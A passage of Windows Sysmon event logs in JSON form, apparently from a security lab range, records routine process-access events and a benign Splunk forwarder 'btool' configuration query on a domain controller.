Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.094","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-0010F35D0500}","SourceProcessId":"4632","SourceThreadId":"4720","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3274,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.127\r\nProcessGuid: {41C8662E-1FF4-5F25-0000-0010AD600500}\r\nProcessId: 3320\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-0010435B0500}\r\nParentProcessId: 4400\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.127","ProcessGuid":"{41C8662E-1FF4-5F25-0000-0010AD600500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-0010435B0500}","ParentProcessId":"4400","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3275,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-0010435B0500}\r\nSourceProcessId: 4400\r\nSourceThreadId: 656\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010AD600500}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-0010435B0500}","SourceProcessId":"4400","SourceThreadId":"656","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010AD600500}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3276,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010AD600500}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010AD600500}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3277,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3278,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3279,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3280,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3281,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
